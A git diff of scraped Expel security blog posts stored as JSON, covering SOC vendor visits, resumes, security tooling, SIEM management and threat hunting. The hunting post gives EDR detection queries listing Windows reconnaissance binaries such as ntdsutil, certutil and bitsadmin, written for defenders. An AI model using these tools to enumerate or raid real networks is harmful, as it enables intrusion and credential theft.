Who is making the decision? They should probably be at the tour. If they\u2019re not, why not? We\u2019re going to ask you if the decision maker will be in the room before we schedule the visit. \u201cYes\u201d means we\u2019re both going to get to an answer about doing business together faster. Random fact: a fast \u201cno\u201d is second in value only to a fast \u201cyes.\u201d \u201cMaybe\u201d kinda sucks, quite frankly. We\u2019ll waste less of your time with \u201cno\u201d or \u201cyes\u201d \u2026 and we both know you don\u2019t have enough time as it is. Your job is hard. Harder than ours, frankly. As for the agenda, we\u2019d suggest skipping things you can do elsewhere if you\u2019re looking to maximize your time. Do things you can only do at the vendor\u2019s facility. Craft an agenda that lets you peek in nooks and crannies. Whatever it is you want to hear about, the interesting part is who delivers the information, and how they do it. You\u2019ll definitely want to see some deliverables. These, obviously have to be scrubbed, so asking in advance is important. In addition to asking for deliverables, ask to see what it looks like when something goes wrong. Because something will go wrong. Anyone who says different is lying. Keep an ace up your sleeve. You\u2019ll need to ask for some things ahead of time to ensure you get them (example: getting a CISO\u2019s time is hard, as you probably know, so if you don\u2019t ask ahead of time when you\u2019re building your agenda you may not get it). But there are lots of other things that should be easy \u2026 and if they aren\u2019t, that tells you something. I\u2019ve got a specific ace to suggest to you below. Step 2: Showtime! The big day arrives and off you go. Huzzah. Whatever the agenda is \u2013 see the SOC, talk to the CISO, do a demo, talk about roadmap \u2013 pay attention to how the content is presented and who presents. That\u2019s often more telling than the content itself. The same goes for the environment it\u2019s presented in. Here\u2019re some things to watch out for: Welcome to the executive briefing center: Don\u2019t get me wrong, EBC\u2019s can be impressive facilities, and they certainly have great snacks. However, if I want to know what I\u2019m buying I want to see the halls and walls where work is done. You can get a sense for the energy of a workplace just by walking around. Do you only get to see the visitor break room, or are you pouring your coffee next to the engineers and analysts building the solutions you\u2019ll be buying? Is everyone energized, or do they look like they just filled in six additional copies of their TPS report that morning? I\u2019ll get back to you: Is a real subject matter expert talking to you about your agenda interest areas, or is it a briefer whose primary job is managing customer and sales prospect visits to the SOC? If it\u2019s an executive, is it a real decision maker or someone with an impressive title that isn\u2019t really involved in running the business? Don\u2019t get me wrong, \u201cI don\u2019t know, I\u2019ll have to get back to you\u201d is a way better answer than someone faking it when you have questions or want decisions, but keep track of the trend. It will tell you how close your presenters live to where the rubber meets the road, and therefore how good a proxy they are for the solution you\u2019re buying. Let me bring up my slides: OMFG not another PowerPoint deck! Yes, some clip art can be useful, but pay attention to whether presenters use other media to help you understand what it\u2019s like to be a customer. Whiteboards for technical discussions, conversations in front of demo screens (or cleansed live screens), energetic dialogue around a table instead of a dry presentation that\u2019s obviously canned \u2013 these indicate you may be getting a truer look into the provider\u2019s reality than if you\u2019re watching a video or a rote-memorized presentation. Does talking to any of the provider\u2019s staff feel like talking to your own team? How you feel after those dialogues tells you something. Here\u2019s our roadmap: OK, a vendor\u2019s plans for the future are well and good \u2026 and necessary. However, consider asking about what was built in the past. \u201cIn the past 12 months, what third-party integrations have you done? Which features did you release? Why?\u201d You know how you ask about work history when you\u2019re hiring someone? There\u2019s a reason for that \u2013 past behavior is a great predictor for future action. Can they answer it? Will they answer it? Again, this tells you a great deal in a very short period of time. Why are you here: If you get access to a few presenters you can often tell a great deal by asking a few questions of each of them. \u201cWhy do you work here?\u201d is a great one. Ask it a few times. Triangulate the truth by comparing answers from different staff. You\u2019ll get a sense for the excitement, energy and pride the provider\u2019s team has \u2026 or doesn\u2019t have. Play the ace: Time to ask for something off script. When touring the SOC ask if you can spend a bit of time with a shift analyst \u2013 someone on the pointy end of the spear whose responsibility is providing service, 24\u00d77. \u201cUm, no you can\u2019t,\u201d tells you something. If you can talk to one, have a conversation to find out what it\u2019s really like to work at the provider. Do you leave the conversation wanting to hire them? In short, get up close and make them uncomfortable Visiting your current \u2026 or would be \u2026 managed security provider can be a telling experience. It\u2019s a big time investment, but it can often be the best way to separate fact from fiction and see what you\u2019re buying first hand In addition to the mechanical requirements (See the SOC? Check. Get the security program presentation? Also check. See the roadmap? Sigh \u2026 check \u2026), think about evaluating the truth in between the lines. Make the provider uncomfortable, get close to where the action happens. The snacks won\u2019t be as good, but it will tell you way more than polished presentations in fancy conference rooms." +} \ No newline at end of file diff --git a/how-to-get-your-resume-noticed-at-expel-or-anywhere.json b/how-to-get-your-resume-noticed-at-expel-or-anywhere.json new file mode 100644 index 0000000000000000000000000000000000000000..47f1977252008de28101544da3221fe616833433 --- /dev/null +++ b/how-to-get-your-resume-noticed-at-expel-or-anywhere.json @@ -0,0 +1,6 @@ +{ + "title": "How to get your resume noticed at Expel (or anywhere)", + "url": "https://expel.com/blog/how-to-get-resume-noticed-at-expel-or-anywhere/", + "date": "May 14, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get your resume noticed at Expel (or anywhere) Talent \u00b7 5 MIN READ \u00b7 AMY ROSSI, YANEK KORFF AND KAREEMA PRICE \u00b7 MAY 14, 2019 \u00b7 TAGS: Career / Employee retention / Great place to work / Hiring Foreword by Yanek Korff. There are few things more pompous than having a blog post with a foreword. Except maybe including a buzzword-filled litany of superlatives that comprise an \u201cobjective statement\u201d at the start of your resume. Or adding pages upon pages of details to your resume in an effort to say, \u201cI worked hard on this!\u201d Friend, I say these things not just to gripe, but to wave a big caution flag before you submit a resume to us (and frankly, probably to a lot of companies). This isn\u2019t a post about what not to do. Instead, we want to help you get noticed. And we\u2019d love to help you put your best foot forward so we can be part of your career journey. Amy and Kareema from our Employee Experience team share suggestions from their experiences below. Considering they represent your first audience here at Expel \u2014 the hiring manager will be your second \u2014 it\u2019s worth considering what they have to say. Some of the advice is high level and requires some quiet reflection on your part. Take the time to do just that. It\u2019ll make the tactics they spell out a lot easier to execute and you\u2019ll end up with a much better resume and overall application (cover letter, anyone?) than the average bear. How to un-suck your resume 1. Know where you\u2019ve been, where you\u2019re at and have thoughts about your future Think about the last time you sat down and made edits to your resume. You probably went right to the bulleted list of your accomplishments to confirm accuracy and then added some more. If this sounds like you, don\u2019t worry \u2026 you\u2019re in good company. Most people approach their resume as an artifact that documents work history in a very tactical and chronological way. At \u201cthat\u201d company, my title was \u201cthis\u201d and I did \u201cthat.\u201d While \u201cthis\u201d and \u201cthat\u201d are important parts of your work history, so are the \u201cwhat\u201d and \u201cwhy.\u201d Reflect on the career moves and decisions you\u2019ve made. Why did you choose that specific job during college? What did you learn from your worst job? How did you know it was time to look for a new role? Taking time to reflect on questions like these will help you think through your past, understand more about the present and determine what you want out of a job in the future. And it\u2019ll make your resume and cover letter (if you choose to include one) immensely better. 2. You do you One of the things you\u2019ll notice as you look over our website is we\u2019re pretty anti-buzzword. Are you a self-starter? Do you thrive in a fast-paced environment and help drive innovation? Bleh. Instead, think about what these overused expressions mean and if there\u2019s a better way to describe some of that in a more clear and authentic way. Wondering where to start? Ask others to describe working with you. They\u2019ll probably offer phrases that are real and true to you. For example, Amy once had to pick an animal that best described her (this was likely part of the intro in some training program). When she was having trouble coming up with a quick answer, she asked someone who worked with her for six years and the person replied immediately: \u201cA dolphin because they\u2019re intelligent, travel in groups, and communicate well.\u201d Getting some quick feedback from someone else can give you insight into key strengths to highlight when you write about what you can bring to a job. 3. Content is (still) king, of course Nobody wants to see a resume that looks like a collection of generic job descriptions. (There\u2019s Google for that.) Instead, share specific things you\u2019ve accomplished and make all those descriptions easily scannable. A couple pro tips for ya: Keep it brief. If you can say what you need to in a page, great. If you need two, sigh , fine. But three? Don\u2019t go there because no one reads that far. Highlight what makes you awesome. What are you proud of? This could be things like industry certifications you\u2019ve earned, years of experience directly related to the type of position you\u2019re applying for at Expel, why you traveled the world or your ability to speak several languages. List these in a \u201cSummary of Qualifications\u201d at the top of your resume. Use numbers whenever possible. Here\u2019s a good formula to use: \u201cAccomplished [feat] by [activity] proven by [metric].\u201d Put your LinkedIn profile on your resume. We like to check out your profile there too. Strike your references from your resume. We don\u2019t need them this early in the process. Watch for spelling, grammatical and formatting errors. Review it not one, not two but three times. And ask a friend to review it. Keep in mind that many people are applying for the same job, and having a resume full of spelling errors is a sure way to get disqualified early in the process. 4. To cover letter or not to cover letter, that is the question Cover letters aren\u2019t necessary for us, but there may be a good reason to write one. For example, if you\u2019ve worked a few jobs here and there with less than a one-year duration, use your cover letter to explain why. Erratic job history is often a red flag for an employer \u2014 and we\u2019re cautious about this too. But we also get there may be some legit reasons for the choices you made and we\u2019re open to understanding them. If you write a cover letter, then write one that\u2019s only for Expel. The standard cover letters that people use when applying to multiple jobs all sound generic. And we want to get to know you . Help us connect the dots between the experience and skills laid out in your resume, and explain to us why you\u2019d be a perfect fit for this job. 5. Get to know us Take time to learn about and connect with Expel. The more you know about us, the easier it\u2019ll be to figure out whether this is the kind of place you want to work, and we\u2019ll have greater confidence that you\u2019re really interested. Connect with us on LinkedIn or follow us on Twitter. Applied online already? Great! Take the extra step and reach out to the recruiter through LinkedIn \u2014 let her know you applied and why you\u2019re interested. When you see something we\u2019ve shared on Twitter that you find interesting, like, comment on it and share it. We\u2019ll notice. 6. Apply for one job only Nothing says \u201cI don\u2019t care, I just want any old job\u201d like applying to multiple jobs at the same company. There are some exceptions to this rule, especially when two jobs are very similar. And if you don\u2019t see a job opening that fits your skills and experience, send an email to careers@expel.io explaining why we should connect now. 7. Go for it Don\u2019t feel like you meet every single qualification? Apply anyway. There\u2019s specific research that shows women often hold back from applying to jobs when they feel like they don\u2019t meet all the criteria. Sometimes this is about confidence, but other research suggests it\u2019s about a misunderstanding of how the hiring process actually works. If for whatever reason you\u2019re hesitating, just go for it. Specific skills and knowledge are important but no more so than the ability to learn and grow. We love finding someone who\u2019s worked in a different industry but can apply their skills to the work we do. This brings new perspectives and experiences to our company, and we value that. Wanna work here? You know what to do. Yes, this post had a foreword, but it\u2019s long enough so we skipped the witty conclusion. (You\u2019re welcome!) Send us a note if we missed any resume \u201cmust haves\u201d or come chat with us on Twitter. Want to apply for a job at Expel? You know what to do. \u261d\ufe0f Are you seriously still reading? Wow, we dig your persistence and thirst for knowledge. If you\u2019d like to keep learning about how to build an excellent resume and, perhaps more importantly, a \u201ccareer management document,\u201d maybe check out the \u201c Your Resume Stinks! \u201d podcast over on the manager-tools website . And if you\u2019re still hungry after that, there\u2019s a slew of updates to listen to after that one. Good luck, and happy job hunting!" +} \ No newline at end of file diff --git a/how-to-get-your-security-tool-chest-in-order-when-you-re.json b/how-to-get-your-security-tool-chest-in-order-when-you-re.json new file mode 100644 index 0000000000000000000000000000000000000000..b0b5ceb878d6802359db646463f196873eac35bc --- /dev/null +++ b/how-to-get-your-security-tool-chest-in-order-when-you-re.json @@ -0,0 +1,6 @@ +{ + "title": "How to get your security tool chest in order when you're ...", + "url": "https://expel.com/blog/how-to-get-security-tool-chest-in-order-when-growing-like-crazy/", + "date": "Apr 30, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to get your security tool chest in order when you\u2019re growing like crazy Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 APR 30, 2019 \u00b7 TAGS: CISO / Managed security / Planning / Selecting tech / Tools There\u2019s a dozen new faces at the all-hands, and HR is adding boatloads of new job reqs to the company website every week. When you\u2019re part of a fast-growing org, security is often left playing catch-up. Maybe you\u2019re still building out your team, or you\u2019re trying to hire just one more full-time employee in addition to yourself to help check off all your to-dos. If this sounds familiar, then it\u2019s time to re-evaluate whether the security tools you\u2019ve got in place today are the right ones for \u201cthe new you.\u201d Before you pour time and money into an assessment, make sure you\u2019ve got some basic tech in place that\u2019ll keep your org\u2019s data protected while you focus on building that longer-term strategy. I know \u2026 that\u2019s sometimes easier said than done. How do you know what kind of tools to invest in? What\u2019s essential and what\u2019s a nice-to-have? In addition to making sure each new tool you invest in will make you and your team more productive and efficient, here are a few tips to consider when thinking about what security tools to keep or buy. Get the obvious and inexpensive controls in place Here\u2019s the TL;DR: Don\u2019t overthink it. Talk to some peers and maybe an analyst. Then make some quick decisions. This first step doesn\u2019t need to turn into a lengthy shootout \u2014 in fact, the longer you take to get the obvious stuff in place like endpoint security and reasonable remote access controls, the greater your risk becomes. There are a few \u201cabsolute goods\u201d that every enterprise should have regardless of whether you\u2019re cloud native or living behind layers of firewalls and surrounded by mainframes. You don\u2019t need a high priced consultant to tell you that having one unified, fully deployed endpoint protection solution is a good thing. Know the broad buckets of tools you need Now that you\u2019ve plugged the big holes, dig down a layer. Ideally you\u2019ve got time (and some in-house expertise) to do a quick NIST CSF self-assessment . That will give you a good gut check of where your big gaps are and where you may be doing better than you think. Once you get through that assessment, jot down the broad buckets of tools you need to have in place to adequately cover the big gaps you see. I\u2019m not talking about specific products, just the big areas that you need to solve for with some kind of tech. Pay attention to what\u2019ll give you the biggest \u201cbang for the buck\u201d \u2014 the places where you can make the most impact on your security posture with the fewest products. There are five big buckets that come to mind, ranked from most important to \u201cyou can worry about this a little later:\u201d \u2713 endpoint controls \u2713 network controls \u2713 identity and access controls \u2713 device management tools \u2713 data consolidation tools (like a SIEM) Do you have at least one tool in place already that falls into each of those categories? If so, that\u2019s great. If not, perhaps you can tweak an existing tool to do the trick. If not, then you\u2019ve got an obvious gap and you should probably focus on making sure you cover that area first before you bring on any more tech. Now, new technology isn\u2019t always the answer (in fact, it sometimes can make things worse). Be sure to pay attention to areas like third-party risk and supply chain risk where process controls are usually far more effective than throwing a product or service at the problem. Make sure any new tech integrates with your existing operational controls Before you go on a buying spree, think about how a new-to-you tool needs to behave in order to integrate with your current operational controls. For instance, if a vendor offers multiple solutions that you can manage as a single unit (I\u2019m thinking of vendors that have unified endpoint and network controls as an example) and you already have one of their solutions, make your life easier and go that route. It may not be the perfect solution, but you\u2019ll likely suffer \u201cdeath by complexity\u201d way before \u201cdeath by lousy product.\u201d Your staff is already familiar with the interfaces and management strategies with these systems, reducing the chances that you\u2019re buying shelfware. Once you get the basics of your program in place and generally have the controls you want, then you can start picking better or different solutions to solve specific problems. From a procurement perspective, keep your contracts short. Now is not the time to lock yourself into a three-year agreement with a service or tool you may want to throw overboard in 12 months. Pay attention to what will (or won\u2019t) work with your infrastructure Last but not least, think about your current infrastructure and whether this new tech will work reliably in that environment. For example, do most of your employees use Macs or PCs? If you\u2019re primarily a Mac shop, don\u2019t choose tech that only runs on Windows OS. Make sure whatever you choose runs well across all the platforms your teams use. Once you\u2019ve figured out the must-haves and can\u2019t-haves from an operational controls and infrastructure perspective, dive deeper into each of those broad buckets of tools I mentioned above. Now start thinking about specific tools you need to add to your stack. For example, tech like network firewalls, web application firewalls, proxy servers and VPN servers, among others, fall under the \u201cnetwork controls\u201d category. Now that you\u2019ve got some new security tech to add to your tool chest, you\u2019ll rest (somewhat) easier at night knowing that you and your team have the basics covered. That said, there are no perfect tools \u2014 so pay attention to how they\u2019re working for your org and whether they\u2019re making your analysts more productive and efficient. If you\u2019re looking for even more tips on how to evaluate your security tools over time, check out \u201cGet your security tools in order: seven tactics to know.\u201d" +} \ No newline at end of file diff --git a/how-to-hunt-for-reconnaissance.json b/how-to-hunt-for-reconnaissance.json new file mode 100644 index 0000000000000000000000000000000000000000..e389610c666fc1ad0262462e4d4ea51382db7ad2 --- /dev/null +++ b/how-to-hunt-for-reconnaissance.json @@ -0,0 +1,6 @@ +{ + "title": "How to hunt for reconnaissance", + "url": "https://expel.com/blog/how-to-hunt-for-reconnaissance/", + "date": "Aug 2, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to hunt for reconnaissance Tips \u00b7 5 MIN READ \u00b7 ALEC RANDAZZO \u00b7 AUG 2, 2018 \u00b7 TAGS: Example / How to / Hunting / Mission Remember the last time you moved to a new city? If it was before the smartphone era it probably took a little driving around to find the best grocery store, coffee shop and whatever other places you were looking for. That\u2019s reconnaissance. And it\u2019s the same thing a threat actor does after compromising a network. Assuming they\u2019re not an insider, once a threat actor gets a foothold in your environment they\u2019ll need to get the lay of the land and learn more about the systems they\u2019re on, the layout of your network and the network\u2019s Active Directory. That\u2019s how attackers figure out what systems and users they\u2019ll have to target to accomplish their ultimate objective \u2013 whether it\u2019s stealing data, stealing money or encrypting your data and extorting you for a ransom payment. When attackers do reconnaissance (attacker tactic), they perform actions that aren\u2019t things most users typically do (hunting hypothesis). Hunting for reconnaissance activity is the process of identifying those, often abnormal, activities. And when it comes to reconnaissance, time is of the essence. When you find a threat actor late in the game, it chews up a lot more time and money. Plus, the potential damage to an organization\u2019s reputation is much higher. Ideally, you want to catch and stop a threat actor as early as possible so they can\u2019t cause too much heartache. That\u2019s why hunting for reconnaissance is important. Where do you start? If you\u2019re interested, more broadly, in how to hunt, check out our previous blog post, What is (cyber) threat hunting and where do you start? It outlines a five-step process that you can use for any hunting exercise. I\u2019m going to walk you through, specifically how to apply that process to hunt for reconnaissance. I\u2019ve already addressed the first two steps above, so let\u2019s jump straight to step three. Hunting process overview Gathering data There are a couple things you\u2019ll want to consider as you figure out what data you need to gather to do your hunting. Of course, you want to make a list of the things you\u2019re looking for. But that list will be constrained by your ability to go get the data. Usually, that boils down to the tools you\u2019ve got to fetch the data. So that\u2019s where we\u2019ll start. In this example, we\u2019re going to assume that we\u2019ve got an endpoint detection and response (EDR) tool in place. At Expel, we use lots of different EDR tools including Carbon Black, Crowdstrike, Endgame, FireEye and Tanium. In this example, we\u2019ll show the query for Carbon Black and Crowdstrike to gather the baseline data. But any of the above EDR tools are equally capable. Next, we identify the tools that a threat actor could use to perform reconnaissance. We focused on built-in Windows tools that attackers can use to do discovery on the network, active directory, or local system. For instance, threat actors will heavily use Windows \u201cnet.exe\u201d commands to query Active Directory in order to enumerate systems, users, and groups. We also focused on these tools being used from a command line process such as \u201ccmd.exe\u201d and \u201cpowershell.exe\u201d. The query below can be used in Carbon Black to return the processes that match our reconnaissance criteria. (parent_name:cmd.exe OR parent_name:powershell.exe) AND (process_name:ver.exe OR process_name:tasklist.exe OR process_name:systeminfo.exe OR process_name:net.exe OR process_name:net1.exe OR process_name:whoami.exe OR process_name:qprocess.exe OR process_name:query.exe OR process_name:ping.exe OR process_name:type.exe OR process_name:reg.exe OR process_name:wmic.exe OR process_name:wusa.exe OR process_name:netsh.exe OR process_name:rundll32.exe OR process_name:sc.exe OR process_name:at.exe OR process_name:fsutil.exe OR process_name:nslookup.exe OR process_name:wevtutil.exe OR process_name:nltest.exe OR process_name:csvde.exe OR process_name:dsquery.exe OR process_name:nbtstat.exe OR process_name:netstat.exe OR process_name:qwinsta.exe OR process_name:vssadmin.exe OR process_name:tcping.exe OR process_name:netdom.exe OR process_name:certutil.exe OR process_name:bitsadmin.exe OR process_name:schtasks.exe OR process_name:ntdsutil.exe OR process_name:find.exe OR process_name:findstr.exe OR process_name:nbtscan.exe OR process_name:dsget.exe The query below is the Crowdstrike equivalent. ImageFileName=\"*ver.exe\" OR ImageFileName=\"*tasklist.exe\" OR ImageFileName=\"*systeminfo.exe\" OR ImageFileName=\"*net.exe\" OR ImageFileName=\"*net1.exe\" OR ImageFileName=\"*whoami.exe\" OR ImageFileName=\"*qprocess.exe\" OR ImageFileName=\"*query.exe\" OR ImageFileName=\"*ping.exe\" OR ImageFileName=\"*type.exe\" OR ImageFileName=\"*reg.exe\" OR ImageFileName=\"*wmic.exe\" OR ImageFileName=\"*wusa.exe\" OR ImageFileName=\"*netsh.exe\" OR ImageFileName=\"*rundll32.exe\" OR ImageFileName=\"*sc.exe\" OR ImageFileName=\"*at.exe\" OR ImageFileName=\"*fsutil.exe\" OR ImageFileName=\"*nslookup.exe\" OR ImageFileName=\"*wevtutil.exe\" OR ImageFileName=\"*nltest.exe\" OR ImageFileName=\"*csvde.exe\" OR ImageFileName=\"*dsquery.exe\" OR ImageFileName=\"*nbtstat.exe\" OR ImageFileName=\"*netstat.exe\" OR ImageFileName=\"*qwinsta.exe\" OR ImageFileName=\"*vssadmin.exe\" OR ImageFileName=\"*tcping.exe\" OR ImageFileName=\"*netdom.exe\" OR ImageFileName=\"*certutil.exe\" OR ImageFileName=\"*bitsadmin.exe\" OR ImageFileName=\"*schtasks.exe\" OR ImageFileName=\"*ntdsutil.exe\" OR ImageFileName=\"*find.exe\" OR ImageFileName=\"*findstr.exe\" OR ImageFileName=\"*nbtscan.exe\" OR ImageFileName=\"*dsget.exe\" Filtering the data Once you run the above query, you\u2019ll be rich with data. When we initially tested this hunting technique on a mid-sized network, we saw over two million results in a 30-day window. That\u2019s more than any human could possibly review in a reasonable amount of time. When you start to filter that data down, the trick is to reduce the volume of things you need to look at without diluting the value of the results. One way we do that is by looking for frequent use of these tools in a short period of time \u2013 specifically single command line processes which call at least three of these tools in a five-minute window. Why do we use this? Based on our experience, if a threat actor is trying to understand a victim\u2019s network, it\u2019s going to take more than a single command. They\u2019ll likely have to execute several (or at least more than three) commands in any given five-minute window. When we apply this filtering logic, it reduced our dataset by 99.96 percent from over two million rows to about 800 rows. That\u2019s a lot more manageable! Reviewing the results Now that we\u2019ve shrunk the volume of data it\u2019s pretty straightforward to review. We just need to remind ourselves of the questions we\u2019re trying to answer. In this case, we\u2019re asking ourselves \u201cIf I were a threat actor, what would this reconnaissance command get me and would that be useful if I was trying to learn more about my surroundings?\u201d You\u2019ll find that by viewing the data with that question as your lens you\u2019ll be able to quickly write off a lot of the data as benign so you can focus on the things you\u2019re going to want to dig into further. When you find something you want to dig into, you can use the process viewer in your EDR tool to get more insight into other processes that were spawned by that parent command line process. In our testing, it took an experienced analyst less than 30 minutes to review the results from this hunt. Given how easy it is to review the data and the high value it provides we didn\u2019t need to refine it any further. Finally, if you do uncover malicious activity it\u2019s a good idea to convert the process command line arguments into an alert trigger in your EDR tool so you\u2019ll be immediately notified if it happens again. That\u2019s a wrap So there you have it. If you\u2019ve got an EDR tool that gives process-level insights give this technique a shot. We think it\u2019s a pretty straightforward and effective approach to find attacker activity when they\u2019re still early in the attack lifecycle. Happy hunting." +} \ No newline at end of file diff --git a/how-to-identify-when-you-ve-lost-control-of-your-siem-and.json b/how-to-identify-when-you-ve-lost-control-of-your-siem-and.json new file mode 100644 index 0000000000000000000000000000000000000000..372db3c76e1da521e97ef179ea00664dab127ae1 --- /dev/null +++ b/how-to-identify-when-you-ve-lost-control-of-your-siem-and.json @@ -0,0 +1,6 @@ +{ + "title": "How to identify when you've lost control of your SIEM (and ...", + "url": "https://expel.com/blog/how-to-identify-when-youve-lost-control-of-your-siem/", + "date": "May 23, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG How to identify when you\u2019ve lost control of your SIEM (and how to rein it back in) Security operations \u00b7 6 MIN READ \u00b7 DAN WHALEN AND LORI EASTERLY \u00b7 MAY 23, 2018 \u00b7 TAGS: Management / SIEM / SOC / Tools Throw a rock in a room full of security folk and you\u2019d be hard pressed to hit someone who wouldn\u2019t agree that a well-oiled SIEM can level up a security operations center (SOC) \u2013 improving threat detection capabilities, reducing time to remediation and serving as a go-to resource for your threat hunters (if you\u2019re lucky enough to have them). But managing that SIEM can turn into a much larger effort than you anticipated when you signed the order form. And sometimes when you put a ton of effort into something it\u2019s easy to lose sight of what you were trying to achieve in the first place. You can end up making choices that contradict your original goals (psychologists call this cognitive dissonance ) And therein lies the problem. What\u2019s an acceptable compromise? And how high should your SIEM pain tolerance be? Four tell-tale signs you\u2019ve lost control 1. \u201cThe SIEM is down again!\u201d Exasperated sighs all around. Analysts throwing their hands up in the air. Muttered grumblings\u2026then chuckles.\u201cI guess we should just take a break, huh?\u201d If your SIEM crashes so often that it has acquired profane nicknames, consider it a sign. 2. Your security investigations are littered with plot holes A plot hole in a good story can be disappointing. But a plot hole in a security investigation can be the difference between a false positive and a business-ending incident (yes, that\u2019s a bit dramatic \u2013 but not unheard of ). If your analysts or incident responders are having trouble answering basic investigative questions like: What is it? How did it get here? Did it run? What happened after? Was data accessed? \u2026 you may be headed for an unfortunately dramatic chapter. 3. You\u2019ve created a SIEM-to-human language lexicon When you first got your SIEM It probably seemed simple enough: a few data sources, a reasonable detection strategy and process documentation for your analysis team. But fast forward a few months, and pressures to plug new tools in, anxiety about new alerting needs and a heap of unexpected business requirements have seriously complicated things. In fact, it seems like nobody knows what\u2019s going on. You\u2019re not even entirely sure what data is actually available in your SIEM these days. The last time you tried to answer questions like \u201cdo we detect attacker technique X?\u201d your head started to spin. You\u2019ve tried to thoroughly document data sources, formats, detection rules and other nuances along the way, but keeping this information up to date is hard (and it\u2019s even harder to make it interesting enough for your analysts to do it). Keep an eye out for the following signs that your team is feeling data management pain: Only one or two analysts really understand how the SIEM is generating alerts Analysts aren\u2019t speaking the same language \u2013 two analysts will use different terminology for the same activity Different analysts are taking different decision paths for same alerts It takes hours for analysts to acquire the evidence they need to run down an alert Analysts have to be experts in logging technologies to interpret alerts correctly 4. Your analysts are doing the tasks you hired your SIEM to do If you haven\u2019t tuned your SIEM since you installed it (or perhaps you never tuned it in the first place), there\u2019s a good chance your analysts are spending most of their time handling low-value security alerts. If you\u2019ve got analysts that aren\u2019t \u201cinvestigating\u201d anymore because they\u2019re too busy clicking the same buttons over and over again (or copy-and-pasting information from one location to another for every alert), then they\u2019re doing what the SIEM was meant to do. Without proper tuning, your SIEM is going to spew out alerts like a fire hydrant on a hot summer day. And that can create an unvirtuous circle. We\u2019ve touched on this before , but predictably this doesn\u2019t lead to happy security analysts . If analysts are constantly under water and days behind on security investigations, it\u2019s time to take a look at where they are spending their time. And that probably means getting control of your SIEM. To regain control, remind yourself why you got a SIEM in the first place If you nodded your head at any (or all) of the above warning signs, hope is not lost. You can rein in your SIEM and show it who\u2019s boss. We\u2019ve seen many people do it. And it starts with taking a step back to look at the big picture. One of the easiest ways to shed our blinders is to remind ourselves why we got a SIEM in the first place. If you\u2019ve got your original SIEM project requirements bouncing around your inbox or (gulp) in a file cabinet somewhere, pull them out. If not, take out a pencil and do your best to reconstruct it. Everyone\u2019s list will be different, but chances are, it looks something like this: Consolidate my security data in one place Detect more security events and incidents Speed up investigation and response processes Reduce analyst error rates Quantify and report on how we\u2019re doing Proactively hunt for threats we missed OK. Now that you\u2019ve got the list of where you want to get (back) to, get all of your stakeholders in a room and start asking some tough questions: Hey analyst\u2026 How often can you get all of the information you need to finish an investigation? How quickly can you retrieve the data you need? Any outliers? How often do you have to augment data with information stored elsewhere (wiki, KB, your brain) to understand and interpret it? How quickly can you tune a false positive or create a new detection in the SIEM? Where do you spend the most of your time? Hey security engineer\u2026 How easy is it to onboard a new technology to the SIEM? How often do you have to perform unexpected maintenance on the SIEM? Where do you spend most of your time? Hey manager\u2026 How often are you able to generate the report you need with the SIEM? Can your team use your SIEM to provide quick answers about your security posture? Or does that require spreadsheets and unnatural acts? Chances are, just by soliciting feedback, you\u2019ll learn a lot about what is and isn\u2019t working well. Whether you\u2019ve just gone a bit off the rails or careened over a cliff, you\u2019ve now identified some areas of opportunity. Now\u2026resist the urge to try and fix everything at once! As you prioritize, keep the value-to-effort ratio in mind. Identifying quick wins and the big pain points will focus your time and resources where they matter most. There are usually several smaller items that \u2013 taken together \u2013 can make a significant impact on the day-to-day workflow of your team. For example, reviewing and tuning high volume, low value events can help to limit alert fatigue. Reviewing top reporting use cases and building dashboards can enable managers self-service answer to common questions instead of tying up analysts. To regain control, you\u2019ll also need to come to terms with two key things your SIEM will never do. 1. A SIEM won\u2019t solve all of your data problems It may be tempting to simply point everything at the SIEM and declare success. But it\u2019s not quite that simple. In fact, you probably shouldn\u2019t make data management someone\u2019s part time job\u2026 because it\u2019s a full-time job. These tips will help avoid some future pain: Prioritize what you put in based on what\u2019s most valuable to stakeholders. Standardize on common logging formats and a single time zone across log sources (UTC if possible). Your analysts will be relieved they no longer have to apply time zone offsets. Understand how data will be used for alerting and document it. Agree on and document a common detection methodology. The MITRE ATT&CK framework is a great place to start. Routinely review the efficacy of SIEM rules using a feedback process that\u2019s quick and easy. 2. Your SIEM != an incident response process This may seem obvious, but installing a SIEM doesn\u2019t mean you have an incident response process . You need to document that separately ( check this out for starters), and it should be decoupled from specific technologies. Your IR process will document steps like \u201cIdentify if the malware ran\u201d instead of \u201crun this query in Splunk.\u201d The latter is great information to share within your analysis team wiki or KB, but you shouldn\u2019t limit your IR process based on the capabilities of the technologies you have in place. Otherwise, you run the risk of sweeping technology deficiencies under the rug instead of highlighting and improving them. Define a great incident response process, and record how the day-to-day execution measures up. In conclusion\u2026 If you\u2019re in the lucky crowd that still has control of your SIEM, congratulations! Just remember it\u2019s easier to regain control when you identify things are getting out of whack early. So\u2026 put a reminder in your calendar to check for these warning signs quarterly. If you\u2019ve decided things are out of control, go through the steps we\u2019ve outlined above. And don\u2019t try to fix it all in one night \u2013 prioritizing your improvements into bite-sized chunks will make them less daunting and you\u2019ll start to see the fruit of your labor sooner. Finally, if you\u2019ve decided that things are out of control and that you need some help to get them back on the rails you\u2019re not alone. There are lots of people who can help depending on your needs: Talk to your SIEM vendor (with your analysts!)\u2013 they may offer professional services worth exploring, and it\u2019s in their best interests to keep you satisfied with your deployment. Consultants can assist with executing on your prioritized list of improvements if you don\u2019t have the resources to spare. Co-managed SIEM services may be worth exploring if you have realized that you don\u2019t want to take on the day-to-day work of keeping your SIEM happy (but don\u2019t breeze by the details here \u2013 make sure you\u2019ll still have the visibility and control you need). If you\u2019re looking to go a step further and augment incident detection and response work, managed detection and response solutions might be a fit as well. Any which way, knowing which category you\u2019re in and figuring out your next step is half the battle." +} \ No newline at end of file diff --git a/how-to-investigate-like-an-expel-analyst.json b/how-to-investigate-like-an-expel-analyst.json new file mode 100644 index 0000000000000000000000000000000000000000..0cb06085f06352c663ba475b617f72103a1e8be1 --- /dev/null +++ b/how-to-investigate-like-an-expel-analyst.json @@ -0,0 +1,6 @@ +{ + "title": "How to investigate like an Expel analyst", + "url": "https://expel.com/blog/how-to-investigate-like-analyst-expel-workbench-managed-alert-process/", + "date": "Dec 15, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG How to investigate like an Expel analyst: The Expel Workbench managed alert process Security operations \u00b7 8 MIN READ 